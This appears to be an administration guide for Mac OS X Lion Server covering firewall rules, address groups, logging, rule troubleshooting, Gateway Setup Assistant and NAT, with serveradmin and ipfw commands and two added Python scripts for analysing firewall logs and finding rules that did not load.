By default, Firewall service permits UDP connections and blocks incoming TCP connections on ports that are not essential for remote administration of the server. Also, by default, stateful rules are in place that permit specific responses to outgoing requests. Before you turn on Firewall service, make sure you've set up rules permitting access from IP addresses you choose; otherwise, no one can access your server. You can easily permit standard services through the firewall without advanced and extensive configuration. Standard services include:
SSH access
Web service
Apple File service
Windows File service
DNS/Multicast DNS
ICMP Echo Reply (incoming pings)
IGMP
PPTP VPN
L2TP VPN
iTunes Music Sharing

Important: If you add or change a rule after starting Firewall service, the new rule affects connections established with the server. For example, if you deny all access to your FTP server after starting Firewall service, computers connected to your FTP server are disconnected.
Parameter   Description
setting     An ipfilter service setting. See Firewall command-line parameters.
value       A value for the setting.

For information about serveradmin, see its man page.

To view a setting:
$ sudo serveradmin settings ipfilter:setting

To view a group of settings:
$ sudo serveradmin settings ipfilter:ipAddressGroups:*
Enter as much of the name as you want, stopping at a colon (:), and then entering an asterisk (*) as a wildcard for the remaining parts of the name.

To view all service configuration settings:
$ sudo serveradmin settings ipfilter

To change a setting:
$ sudo serveradmin settings ipfilter:setting = value

To change several settings:
$ sudo serveradmin settings
ipfilter:setting = value
ipfilter:setting = value
ipfilter:setting = value
[...]
Control-D


Configure for standard services


By default, Firewall service permits UDP connections and blocks incoming TCP connections on ports that are not essential for remote administration of the server. Also, by default, stateful rules are in place that permit specific responses to outgoing requests. Before you turn on Firewall service, make sure you've set up rules permitting access from IP addresses you choose; otherwise, no one can access your server. You can easily permit standard services through the firewall without advanced and extensive configuration. Standard services include:
SSH access
Web service
Apple File service
Windows File service
DNS/Multicast DNS
ICMP Echo Reply (incoming pings)
IGMP
PPTP VPN
L2TP VPN
iTunes Music Sharing

Important: If you add or change a rule after starting Firewall service, the new rule affects connections established with the server. For example, if you deny all access to your FTP server after starting Firewall service, computers connected to your FTP server are disconnected.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Settings, then click Services.
5. From the Editing Services for pop-up menu, select an address group.
6. For the address group, choose to permit all traffic from any port or to permit traffic on designated ports.
7. For each service you want the address group to use, select Allow. If you don't see the service you need, add a port and description to the services list. To create a custom rule, see Configure advanced firewall rules (CLI) or Configure advanced firewall rules.
8. Click Save.


Add to the services list


You can add custom ports to the Services list. This enables you to open specific ports to address groups without creating an advanced IP rule.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Settings, then click Services.
5. Below the services list, click the Add button (+).
6. Enter a rule name for the service.
7. Enter a single port (for example, 22) or a port range (for example, 650-750).
8. Choose a protocol. If you want a protocol other than TCP or UDP, use the Advanced settings to create a custom rule.
9. Click OK.
10. Click Save.


Enable stealth mode


You can hide your firewall by choosing not to send a connection failure notification to any connection that is blocked by the firewall. This is called stealth mode and it effectively hides your server's closed ports. For example, if a network intruder tries to connect to your server, even if the port is blocked, he or she knows that there is a server and can find other ways to intrude. If stealth mode is enabled, instead of being rejected, the hacker won't receive notification that an attempted connection took place.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Settings, then click Advanced.
5. Select Enable for TCP, Enable for UDP, or both, as needed.
6. Click Save.


Change the order of advanced firewall rules


The priority level of an advanced firewall rule is determined by its order in the Advanced Rules list. Default rules that are locked cannot be reordered in the list.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Settings, then click Advanced.
5. Drag the rules to reorder them in the needed sequence. Default rules, which are designated by the lock icon, cannot be reordered.
6. Click Save.


Configure address groups settings


You can define groups of IP addresses for firewall rules. Then you can use these groups to organize and target the rules. The any address group is for all addresses. Two other IP address groups are present by default, intended for the entire 10-net range of private addresses and the entire 192.168-net range of private addresses. Addresses can be listed as individual addresses (192.168.2.2), IP addresses and subnet mask in CIDR notation (192.168.2.0/24), or IP addresses and subnet mask in netmask notation (192.168.2.0:255.255.255.0).

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Settings, then click Address Groups.
5. Below the Address Group pane, click the Add button (+).
6. In the Group name field, enter a group name.
7. Use the Add (+) and Delete (–) buttons to enter the IP addresses you want the rules to affect. To indicate any IP address, use the word any.
8. Click OK.
9. Click Save.


Create an address group


Use Server Admin to create address groups for Firewall service.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Settings, then click Address Groups.
5. Below the IP Address Groups list, click the Add button (+).
6. In the Group name field, enter a group name.
7. Use the Add (+) and Delete (–) buttons to enter the addresses and subnet mask you want the rules to affect. To indicate any IP address, use the word any.
8. Click OK.
9. Click Save.


Duplicate an address group


You can duplicate address groups from your firewall rule list. This can help speed configuration of similar address groups.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Settings, then click Address Groups.
5. From the IP Address Groups list, select the group name.
6. Below the IP Address Groups list, click the Duplicate button.
7. Make the required modifications and click OK.
8. Click Save.


Edit or delete an address group


You can edit address groups to change the range of IP addresses affected. The default address group is for all addresses. You can remove address groups from your firewall rule list. The rules associated with those addresses are also deleted. Addresses can be listed as individual addresses (192.168.2.2), IP address and network mask in CIDR notation (192.168.2.0/24), or IP address and network mask in netmask notation (192.168.2.0:255.255.255.0).

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Settings, then click Address Groups.
5. From the IP Address Groups list, select the group name.
6. To edit an IP address group, click the Edit button (/) below the list, edit the Group name or addresses as needed, and then click OK.
7. To delete an IP address group, click the Delete button (–) below the list.
8. Click Save.

Network infrastructure services

Firewall service

Monitoring firewalls

Configure firewall logging settings


You can choose the types of packets to log. You can log the packets that are denied access, the packets that are permitted access, or both. Each logging option can generate many log entries, but you can limit the volume of entries by:
Logging only permitted packets or denied packets, instead of all packets
Logging packets only as long as necessary
Using the Logging Settings pane to limit the total number of packets
Adding a count rule in the Advanced Settings pane to record the number of packets that match the characteristics you're interested in measuring

1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Logging. 5. Select the Enable logging checkbox and choose to log permitted packets , denied packets , or a designated number of packets . 6. Click Save.


Check the status of Firewall service (CLI)


Use the serveradmin tool to check the status of Firewall service, which serveradmin identifies as ipfilter. For information about serveradmin, see its man page.

See summary status of the service:
$ sudo serveradmin status ipfilter
See detailed status of the service, including rules:
$ sudo serveradmin fullstatus ipfilter


Check the status of Firewall service

Use Server Admin to check the status of Firewall service.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Overview to see whether the service is running, the number of active static and dynamic rules configured, the number of matching packets, and the number of bytes in matching packets handled by the firewall.
5. Click Log to review the Firewall service log. To search for specific entries, use the Filter field above the log.
6. To view a list of active firewall rules, click Active Rules. A list of rules appears, with a description of each rule in ipfw code format, the priority, packet count, and total bytes handled.


View firewall active rules


Use Server Admin to view a simple summary of active firewall rules. The Active Rules pane shows the number of packets and bytes associated with each rule.

When a change is made to the configuration of the firewall using Server Admin, the old firewall rules are flushed, new rules are generated and saved in a file, and the ipfw command is invoked to load the rules into service. As part of the flush operation, the packet and byte counters for each rule are cleared, so the counts always reflect activity since the last configuration change.

The Active Rules pane provides a snapshot of the state of the firewall. When viewing this pane, dynamic rules might be shown with static rules. Dynamic rules come and go in a matter of seconds, in response to network activity. They are the result of rules that include a keep-state clause (stateful rules). The Active Rules pane shows the rule number of the stateful rule that was triggered to create the dynamic rule.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Active Rules. A list of the rules appears, with a description of each rule in ipfw code format, the priority, packet count, and total bytes handled.


View denied packets


Viewing denied packets can help you identify problems and troubleshoot Firewall service.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Settings, then click Logging.
5. Make sure Log all denied packets is selected. If you have not turned on logging for a rule, see Edit or delete advanced firewall rules.
6. To view log entries, click Log.
7. In the text filter box, enter the word unreach. Rules that use the deny action instead of unreach are logged with the word Deny, so filter on Deny as well to see every rejected packet.


View the Firewall service log (CLI)


Each rule you set up in Server Admin corresponds to rules in the underlying firewall software. Log entries show you when the rule was applied, the IP address of the client and server, and other information. The log view shows the contents of /var/log/ipfw.log. See examples at Firewall log examples.

See where the ipfilter service log is located:
$ sudo serveradmin command ipfilter:command = getLogPaths
ipfilter:systemLog = "/var/log/ipfw.log"
View the latest entries in the log, substituting the path reported above for log-file:
$ sudo tail log-file


View the Firewall service log


Each rule you set up in Server Admin corresponds to rules in the underlying firewall software. Log entries show you when the rule was applied, the IP address of the client and server, and other information. The log view shows the contents of /var/log/ipfw.log. See examples at Firewall log examples.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Log. To search for specific entries, use the Filter field above the log. You can refine the view using the text filter box.


View packets logged by firewall rules


Viewing the packets filtered by firewall rules can help you identify problems and troubleshoot Firewall service.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Firewall.
4. Click Settings, then click Logging.
5. Make sure Log all allowed packets is selected. If you have not turned on logging for a rule, see Edit or delete advanced firewall rules.
6. To view log entries, click Log.
7. Enter the word Accept in the text filter box.


Firewall log examples


The filters you create in Server Admin correspond to rules in the underlying filtering software. Log entries show you the rule applied, the IP address of the client and server, and other information. For information about tail and serveradmin, see their man pages.

Log example 1
Dec 12 13:08:16 ballch5 mach_kernel: ipfw: 65000 Unreach TCP 10.221.41.33:2190 192.168.12.12:80 in via en0
This entry shows that Firewall service used rule 65000 to deny (unreach) the remote client at 10.221.41.33:2190 from accessing server 192.168.12.12 on web port 80 through Ethernet port 0.

Log example 2
Dec 12 13:20:15 mayalu6 mach_kernel: ipfw: 100 Accept TCP 10.221.41.33:721 192.168.12.12:515 in via en0
This entry shows that Firewall service used rule 100 to permit the remote client at 10.221.41.33:721 to access the server 192.168.12.12 on the LPR printing port 515 through Ethernet port 0.

Log example 3
Dec 12 13:33:15 smithy2 mach_kernel: ipfw: 10 Accept TCP 192.168.12.12:49152 192.168.12.12:660 out via lo0
This entry shows the NAT divert rule applied to an outbound packet. In this case the packet is diverted to port 660, which is the port the NAT daemon uses.
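The following Python is an added example, not part of the Lion Server guide: it parses lines in the /var/log/ipfw.log format shown above, separates rejected packets (ipfw writes Deny, Unreach or Reset) from accepted ones, and ranks the denied source addresses and target ports, which is what you want when a flood of Unreach entries hides the few that matter. The log lines it runs against are constructed for the example and follow the format of the three entries above.

```python
import re
from collections import Counter

# Constructed sample of /var/log/ipfw.log in the format shown in the examples
# above (hosts, addresses and times are made up for this example).
SAMPLE_LOG = """\
Dec 12 13:08:16 ballch5 mach_kernel: ipfw: 65000 Unreach TCP 10.221.41.33:2190 192.168.12.12:80 in via en0
Dec 12 13:08:17 ballch5 mach_kernel: ipfw: 65000 Unreach TCP 10.221.41.33:2191 192.168.12.12:22 in via en0
Dec 12 13:20:15 ballch5 mach_kernel: ipfw: 100 Accept TCP 10.221.41.33:721 192.168.12.12:515 in via en0
Dec 12 13:33:15 ballch5 mach_kernel: ipfw: 10 Accept TCP 192.168.12.12:49152 192.168.12.12:660 out via lo0
Dec 12 13:40:02 ballch5 mach_kernel: ipfw: 65000 Deny ICMP:8.0 10.221.41.77 192.168.12.12 in via en0
Dec 12 13:41:09 ballch5 mach_kernel: ipfw: 65000 Unreach UDP 10.221.41.77:53000 192.168.12.12:161 in via en0
"""

# rule number, action, protocol (ICMP carries type.code after a colon),
# source[:port], destination[:port], direction and interface.
LINE_RE = re.compile(
    r"ipfw: (?P<rule>\d+) (?P<action>\w+) (?P<proto>[A-Za-z]+(?::[\d.]+)?) "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<sport>\d+))? "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<dport>\d+))? "
    r"(?P<direction>in|out) via (?P<iface>\S+)"
)

# Actions ipfw writes for packets it rejects; everything else was let through.
DENY_ACTIONS = {"Deny", "Unreach", "Reset"}


def parse_ipfw_line(line):
    """Return a dict for one log line, or None if it is not an ipfw entry."""
    m = LINE_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["rule"] = int(rec["rule"])
    rec["sport"] = int(rec["sport"]) if rec["sport"] else None
    rec["dport"] = int(rec["dport"]) if rec["dport"] else None
    rec["denied"] = rec["action"] in DENY_ACTIONS
    return rec


def summarize(log_text, top=3):
    """Count entries per action and rule, and rank denied sources and target ports."""
    records = [r for r in map(parse_ipfw_line, log_text.splitlines()) if r]
    denied = [r for r in records if r["denied"]]
    return {
        "total": len(records),
        "by_action": dict(Counter(r["action"] for r in records)),
        "by_rule": dict(Counter(r["rule"] for r in records)),
        "top_denied_sources": Counter(r["src"] for r in denied).most_common(top),
        "top_denied_ports": Counter(
            (r["proto"], r["dport"]) for r in denied if r["dport"]
        ).most_common(top),
    }


if __name__ == "__main__":
    # On a real server replace SAMPLE_LOG with open("/var/log/ipfw.log").read().
    for key, value in summarize(SAMPLE_LOG).items():
        print(key, "=", value)
```

The by_rule counts tell you whether rejections are coming from your own rules or from the catch-all rule 65000, and a source that appears in top_denied_sources against several different ports is a scan rather than a misconfigured client.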

Network infrastructure services > Firewall service > Advanced firewall topics

Troubleshoot advanced firewall rules


The Advanced Settings pane accepts whatever rule text you enter and assumes it is a correctly formed ipfw rule; it does not check the syntax. Errors are not noticed until the rules are saved and Server Admin applies all rules using the ipfw command. Then the first rule with a syntax error causes the operation to stop, and an error message is logged. This error message does not indicate which rule is invalid. All valid rules before the invalid one are loaded in the firewall, but the rules after it are not, so a single typo can silently leave later allow or deny rules out of the running firewall. The following section describes how you can determine which rule is invalid.

1. Read the error message in the log.
2. Wait a few minutes for Server Admin to show the active rules in the Firewall Overview pane.
3. Compare the list of active rules in the Firewall Overview pane with the rule list in the Settings section.
4. Inspect the contents of the /etc/ipfilter/ipfw.conf.apple file to see which rules Server Admin tried to load in the firewall. The first rule in the file that is not present in the Firewall Overview pane is likely the invalid one. However, there might be more invalid rules after that one.
5. If the rule corresponds to one from the Advanced Settings pane, disable it or correct it. Disabled rules appear in the /etc/ipfilter/ipfw.conf.apple file preceded by a comment character so they are not processed by the ipfw tool.
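As an added example (not from the guide), this Python automates step 4 above: it reads the rule numbers Server Admin wrote to /etc/ipfilter/ipfw.conf.apple, compares them with the numbers in the output of ipfw list, and reports the first enabled rule that is not loaded along with every rule after it. The configuration file and ipfw list output it uses are constructed stand-ins; rule 12302's dst-prot typo and the file paths in the comments are this example's assumptions.

```python
import re

# Constructed stand-in for /etc/ipfilter/ipfw.conf.apple as Server Admin writes it.
# Rule 12302 contains a typo (dst-prot) that ipfw would reject; rule 1030 was
# disabled in Server Admin, so it is written out behind a comment character.
CONF_TEXT = """\
# ipfw.conf.apple (constructed example)
add 01000 allow ip from any to any via lo0
add 01010 deny ip from any to 127.0.0.0/8
add 01020 deny ip from 224.0.0.0/4 to any in
#add 01030 allow tcp from any to any dst-port 8080 in
add 12300 allow tcp from any to any dst-port 22 in
add 12301 allow tcp from 192.168.0.0/16 to any dst-port 80 setup
add 12302 allow tcp from any to any dst-prot 9999 in
add 12303 allow udp from 192.168.0.0/16 to any dst-port 53
"""

# Constructed output of `sudo ipfw list` after the load stopped at the bad rule.
# 65535 is the kernel's built-in default rule and is always present.
ACTIVE_TEXT = """\
01000 allow ip from any to any via lo0
01010 deny ip from any to 127.0.0.0/8
01020 deny ip from 224.0.0.0/4 to any in
12300 allow tcp from any to any dst-port 22 in
12301 allow tcp from 192.168.0.0/16 to any dst-port 80 setup
65535 allow ip from any to any
"""

CONF_RULE_RE = re.compile(r"^\s*(?P<off>#\s*)?add\s+(?P<num>\d+)\s+(?P<body>.*?)\s*$")
ACTIVE_RULE_RE = re.compile(r"^\s*(?P<num>\d+)\s+(?P<body>.*?)\s*$")


def parse_conf_rules(text):
    """(rule number, body, enabled) for every add line, in file order."""
    rules = []
    for line in text.splitlines():
        m = CONF_RULE_RE.match(line)
        if m:
            rules.append((int(m.group("num")), m.group("body"), m.group("off") is None))
    return rules


def parse_active_rules(text):
    """Rule numbers currently loaded in the kernel, from `ipfw list` output."""
    return {int(m.group("num")) for m in map(ACTIVE_RULE_RE.match, text.splitlines()) if m}


def find_unloaded(conf_text, active_text):
    """Compare the file Server Admin tried to load with what is actually active.

    Returns the first enabled rule that did not make it into the kernel (the
    likely syntax error), every enabled rule that is missing (ipfw stops at the
    first bad rule, so later valid rules are missing too), and the disabled ones.
    """
    active = parse_active_rules(active_text)
    missing, disabled = [], []
    for num, body, enabled in parse_conf_rules(conf_text):
        if not enabled:
            disabled.append(num)
        elif num not in active:
            missing.append((num, body))
    return {
        "first_suspect": missing[0] if missing else None,
        "not_loaded": [num for num, _ in missing],
        "disabled": disabled,
    }


if __name__ == "__main__":
    # On the server: CONF_TEXT = open("/etc/ipfilter/ipfw.conf.apple").read()
    # and ACTIVE_TEXT = subprocess.check_output(["ipfw", "list"], text=True)
    print(find_unloaded(CONF_TEXT, ACTIVE_TEXT))
```

The not_loaded list is the real damage report: everything in it, valid or not, is absent from the running firewall until the first suspect is fixed or disabled and the rules are saved again.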


Disable Firewall service (CLI)


You can disable Firewall service using Terminal. Setting this sysctl to 0 turns off packet filtering entirely, so no rule is enforced until you set net.inet.ip.fw.enable back to 1 or start Firewall service again; the setting is not preserved across a restart of the server.

In Terminal, enter the following at the command line:
$ sudo /usr/sbin/sysctl -w net.inet.ip.fw.enable=0


Reset the firewall to the default setting


A server can become unreachable for remote administration because of an error in the firewall configuration. In that case, you must reset the firewall to its default state so Server Admin can access the server. This recovery procedure requires the command-line interface and must be done by an administrator who has physical access to the server.

1. Disconnect the server from the Internet.
2. Restart the server in single-user mode by holding down the Command and S keys during startup. The startup volume is mounted read-only in single-user mode; run /sbin/fsck -fy and then /sbin/mount -uw / before changing any files.
3. Remove or rename the address groups file found at /etc/ipfilter/ip_address_groups.plist.
4. Remove or rename the ipfw configuration file found at /etc/ipfilter/ipfw.conf.
5. Force-flush the firewall rules by entering the following at the prompt: sudo ipfw -f flush
6. Edit the /etc/hostconfig file and set IPFILTER=-YES-.
7. Enter exit to complete the startup sequence to the login window. The computer starts up with the default firewall rules and the firewall enabled. Use Server Admin to refine the firewall configuration.
8. Log in to your server's local administrator account to confirm that the firewall is restored to its default configuration.
9. Reconnect your host to the Internet.

Network infrastructure services > Gateway Setup Assistant

About Gateway Setup Assistant


Gateway Setup Assistant helps you easily set up a Mac server to share your Internet connection with your local network. After you configure a few settings, the assistant can start sharing the server connection. Depending on your configuration choices, the assistant performs the following when it sets up the server:
- Assigns the server a static IP address for each internal network interface. The address assigned is 192.168.x.1. The value used for x is determined by the network interface's order in the Network System Preference pane. For example, for the first interface on the list, x is 0; for the second interface, x is 1.
- Enables DHCP to allocate addresses on the internal network, removing existing DHCP subnets.
- Sets aside specific internal (192.168.x.x) addresses for DHCP use. Without VPN started, each interface can allocate addresses from 192.168.x.2 to 192.168.x.254.
- (Optional) Enables VPN to permit authorized external clients to connect to the local network. VPN L2TP is enabled, so you must enter a shared secret (a passphrase) for client connections to use.
- Sets aside specific internal addresses (192.168.x.x) for VPN use. If VPN is selected, half of the allotted IP addresses in the DHCP range are reserved for VPN connections. The addresses 192.168.x.128 through 192.168.x.254 are allotted to VPN connections.
- Enables the firewall to help secure the internal network. Address groups are added for each internal network interface, with all traffic permitted from the newly created DHCP address ranges to any destination address.
- Enables network address translation (NAT) on the internal network and adds a NAT divert rule to the IP firewall to direct network traffic to the correct computer. This also protects the internal network from unsolicited external connections.
- Enables DNS on the server, configured to cache lookups, to improve DNS response for internal clients.

When configuring these settings, you can review the proposed changes before committing to them and overwriting existing settings. You can make further changes to the service configuration using Server Admin. For network services, see the relevant section in this book for information. If you run Gateway Setup Assistant again, it overwrites manual settings you made. To use the assistant, see Run Gateway Setup Assistant.


Run Gateway Setup Assistant


You run Gateway Setup Assistant from the NAT Service Overview pane in Server Admin. Gateway Setup Assistant requires two network interfaces. For example, if you have a Mac mini with Lion Server, you may want to connect an Apple USB Ethernet adapter or equivalent before running Gateway Setup Assistant. For more information about Gateway Setup Assistant, see About Gateway Setup Assistant.

1. Open Server Admin and connect to the server.
2. Click Settings, then click Services.
3. Select the NAT checkbox, then click Save.
4. Click the triangle at the left of the server. The list of services appears.
5. From the expanded Servers list, select NAT.
6. Click Overview.
7. Click Gateway Setup Assistant.
8. Follow the directions in the assistant, click Continue after each page, read the final configuration summary carefully, and make sure you approve of the settings before finalizing the configuration.

WARNING: Although you can use Gateway Setup Assistant to configure remote servers, you can accidentally cut off your administrator access to the remote server after the gateway is complete. This can happen because the firewall is enabled and may deny remote access to the server. To prevent this, make sure your firewall is configured to permit remote access from your administrator computer (for example, Server Admin on TCP port 311 and SSH on TCP port 22) before you run the assistant.


Connect a wireless LAN to the Internet


Connecting wireless clients to the Internet through a Mac server gateway provides the following advantages over using AirPort Base Station built-in functions:
- Advanced firewall control
- DHCP allocation of static IP addresses
- DNS caching
- Incoming VPN connections to the LAN

If you do not need these advanced functions, use the AirPort Base Station to connect your wireless clients to the Internet without placing the Mac server between the Base Station and the Internet. To take advantage of the gateway's features, you use the Base Station as a bridge between your wireless clients and the gateway. Each client connects to the Base Station, and the Base Station sends network traffic through the gateway.

Wireless clients must be able to connect to the AirPort Base Station's wireless network to be linked to the gateway. After this process, computers connected to the AirPort Base Station:
- Can get IP addresses and network settings configured using DHCP
- Can access the Internet if the gateway is connected to the Internet
- Can't be accessed by unauthorized network connections originating from the wired connection to the Internet
- Can be accessed over the Internet by authorized VPN clients (if VPN is configured)
- Can benefit from DNS lookup caching in the gateway, which speeds DNS resolution

1. Plug the connection to the Internet into the Ethernet 1 (en0) port.
2. Connect the AirPort Base Station port (the WAN port, if there are two) to the Ethernet 2 (en1) port.
3. Using AirPort Utility, configure the Base Station to connect using Ethernet and to get its address using DHCP. You can open it from the /Applications/Utilities/ folder.
4. Select a Base Station and then choose Manual Setup from the Base Station menu.
5. Enter the Base Station password if necessary.
6. Click Internet in the toolbar, then click Internet Connection.
7. From the Connect Using pop-up menu, choose Ethernet.
8. From the Configure IPv4 pop-up menu, choose Using DHCP.
9. From the Connection Sharing pop-up menu, choose Off (Bridge Mode).
10. To change Base Station settings, click Update.
11. Open Server Admin and connect to the server.
12. Click Settings, then click Services.
13. Select the NAT checkbox.
14. Click Save.
15. Click the triangle at the left of the server. The list of services appears.
16. From the expanded Servers list, select NAT.
17. Click Overview, then click Gateway Setup Assistant.
18. Click Continue.
19. For your WAN (Internet) interface, designate Built-In Ethernet 1.
20. For your LAN (sharing) interface, designate Built-In Ethernet 2. Your LAN interface is the one connected to your local network. Computers on the LAN share the server's Internet connection through the server's WAN interface. If your server has more than one interface available (Ethernet port 2, Ethernet port 3, and so on), choose those you want to enable.
21. Choose whether to make this gateway a VPN entry point to your LAN. If you enable VPN, you need a shared secret. A shared secret is a passphrase that users must provide to securely connect to the VPN gateway. It should be a very secure passphrase, not a password of a user or administrator on the gateway server. To set a very secure passphrase, use Password Assistant in Account Preferences.
22. Inspect and confirm the changes.

You can fine-tune the settings from this base configuration, but you perform additional configuration in Server Admin. For example, you can use Server Admin to assign IP addresses to specific computers. To do this, add static address mappings in the DHCP section's Settings tab. For more information, see Use DHCP to assign static IP addresses. You can also change firewall settings to permit connections from the Internet to the LAN. To do this, change the firewall settings, opening up IP ports as needed, and configure port forwarding in the NAT pane to designate which computer on the LAN is to accept incoming traffic.


Connect a wired LAN to the Internet


You can use Gateway Setup Assistant to connect a wired LAN to the Internet. Your LAN can consist of any number of computers connected to each other through Ethernet hubs and switches, but the LAN must have one point of contact with the Internet (the gateway). Your gateway has one connection to the Internet and one connection to the LAN. All other computers access the Internet through your gateway. You can configure your Mac server to be a gateway to the Internet, which requires that your server have two Ethernet ports (en0 and en1). Port en0 should be connected to the Internet and en1 should be connected to your LAN.

After this process, computers on the LAN:
- Can get IP addresses and network settings that were configured using DHCP
- Can access the Internet if the gateway is connected to the Internet
- Can't be accessed by unauthorized network connections originating from the Internet
- Can be accessed over the Internet by authorized VPN clients (if VPN is configured)
- Can benefit from DNS lookup caching in the gateway, which speeds DNS resolution

1. Plug the connection to the Internet into the Ethernet 1 (en0) port.
2. Plug the connection to your LAN into the Ethernet 2 (en1) port.
3. Open Server Admin and connect to the server.
4. Click Settings, then click Services.
5. Select the NAT checkbox.
6. Click Save.
7. Click the triangle at the left of the server. The list of services appears.
8. From the expanded Servers list, select NAT.
9. Click Overview, then click Gateway Setup Assistant.
10. Click Continue. If your server has existing DHCP, DNS, NAT, and VPN configurations, you are prompted to overwrite those configurations. To overwrite configurations, click Overwrite to continue.
11. From the Gateway WAN Interface pop-up menu, choose Ethernet 1 (en0) for your WAN interface, then click Continue.
12. From the list of network interfaces, select the Ethernet 2 checkbox for your LAN interface and click Continue. Your LAN interface is the one connected to your local network. Computers on the LAN share the server's Internet connection through the server's WAN interface. If your server has more than one interface available (Ethernet port 2, Ethernet port 3, and so on), choose those you want to enable.
13. (Optional) To make your gateway server a VPN entry point to your LAN, select Enable VPN for this server. If you enable VPN, you need a shared secret. A shared secret is a passphrase that users provide to connect to the VPN gateway. It should be a very secure passphrase, not the password of a user or administrator on the gateway server. To set a very secure passphrase, use Password Assistant in Account Preferences. For more information, see Mac OS X Server Security Configuration.
14. Click Continue.
15. Inspect and confirm your setup.
16. Click Continue. NAT and all dependent services will be configured and started.
17. Click Close.


Connect a wired LAN and wireless clients to the Internet


You can use Gateway Setup Assistant to connect a wired LAN and wireless clients to the Internet. Your LAN can consist of any number of computers connected to each other through Ethernet hubs and switches, but the LAN must have one point of contact with the Internet (the gateway). Your LAN must also have an AirPort Base Station to connect the wireless computers to the wired network. Your wireless clients must be able to connect to the AirPort Base Station's wireless network to be linked to the wired LAN.

After this process, computers on the LAN and those connected to the AirPort Base Station:
- Can get IP addresses and network settings configured using DHCP
- Can access the Internet, if the gateway is connected to the Internet
- Can't be accessed by unauthorized network connections originating from the wired connection to the Internet
- Can be accessed over the Internet by authorized VPN clients (if VPN is configured)
- Can benefit from DNS lookup caching in the gateway, which speeds DNS resolution

1. Plug the connection to the Internet into the Ethernet 1 (en0) port.
2. Plug the connection to your LAN into the Ethernet 2 (en1) port.
3. Connect the AirPort Base Station port (the WAN port, if there are two) to the wired network.
4. Using AirPort Utility, configure the Base Station to connect using Ethernet and to get its address using DHCP. You can open it from the /Applications/Utilities/ folder.
5. Select the Base Station and then choose Manual Setup from the Base Station menu.
6. Enter the Base Station password if necessary.
7. Click Internet in the toolbar, then click Internet Connection.
8. From the Connect Using pop-up menu, choose Ethernet.
9. From the Configure IPv4 pop-up menu, choose Using DHCP.
10. From the Connection Sharing pop-up menu, choose Off (Bridge Mode).
11. To change Base Station settings, click Update.
12. Open Server Admin and connect to the server.
13. Click Settings, then click Services.
14. Select the NAT checkbox.
15. Click Save.
16. Click the triangle at the left of the server. The list of services appears.
17. From the expanded Servers list, select NAT.
18. Click Overview, then click Gateway Setup Assistant.
19. Click Continue.
20. For your WAN (Internet) interface, designate Ethernet 1.
21. For your LAN (sharing) interface, designate Ethernet 2. Your LAN interface is the one connected to your local network. Computers on the LAN share the server's Internet connection through the server's WAN interface. If your server has more than one interface available (Ethernet port 2, Ethernet port 3, and so on), choose those you want to enable.
22. Choose whether to make this gateway a VPN entry point to your LAN. If you enable VPN, you need a shared secret. A shared secret is a passphrase that users must provide to securely connect to the VPN gateway. It should be a very secure passphrase, not a password of a user or administrator on the gateway server. To set a very secure passphrase, use Password Assistant in Account Preferences.
23. Inspect and confirm the changes.

Network infrastructure services > NAT

About NAT
Network Address Translation (NAT) is a technique you use to give multiple computers access to the Internet using only one assigned public or external IP address. NAT permits you to create a private network that accesses the Internet through a NAT router or gateway. NAT is sometimes referred to as IP masquerading.

The NAT router takes traffic from your private network and remembers the internal addresses that have made requests. When the NAT router receives a response to a request, it forwards it to the originating computer. Traffic that originates from the Internet does not reach computers behind the NAT router unless port forwarding is enabled.

Enabling NAT on a Lion Server often requires detailed control over DHCP, so DHCP is configured separately in Server Admin. To learn more about DHCP, see DHCP setup overview.

Enabling NAT also creates a divert rule in the firewall configuration. Server Admin permits NAT service and Firewall service to be enabled and disabled independently. However, for NAT service to function, NAT service and Firewall service must both be enabled. This is because an essential part of NAT is the packet divert rule. That rule is added to the firewall when NAT service is enabled, but Firewall service must be turned on for the packet divert rule, or any firewall rule, to have effect.

The natd daemon process controls NAT service. For information about how to access natd features and implement them, see the natd man page.

Request for Comments (RFC) documents provide an overview of a protocol or service and details about how the protocol should behave. If you're a novice server administrator, you'll probably find some of the background information in an RFC helpful. If you're an experienced server administrator, you can find the technical details about a protocol in its RFC document. You can search for RFC documents by number at www.ietf.org/rfc.html. For NAT descriptions, see:
- RFC 1631
- RFC 3022


NAT LAN configuration overview


To configure a network segment as a NAT LAN, you must complete several steps. Each is necessary to create a functioning private network behind a NAT gateway. A detailed example of the setup is found in Link a LAN to the Internet through one IP address. You can also configure NAT using Gateway Setup Assistant, which configures each of these services and starts NAT. For more information, see About Gateway Setup Assistant. The following provides an overview of the configuration process.

Choose your NAT gateway and interface functions
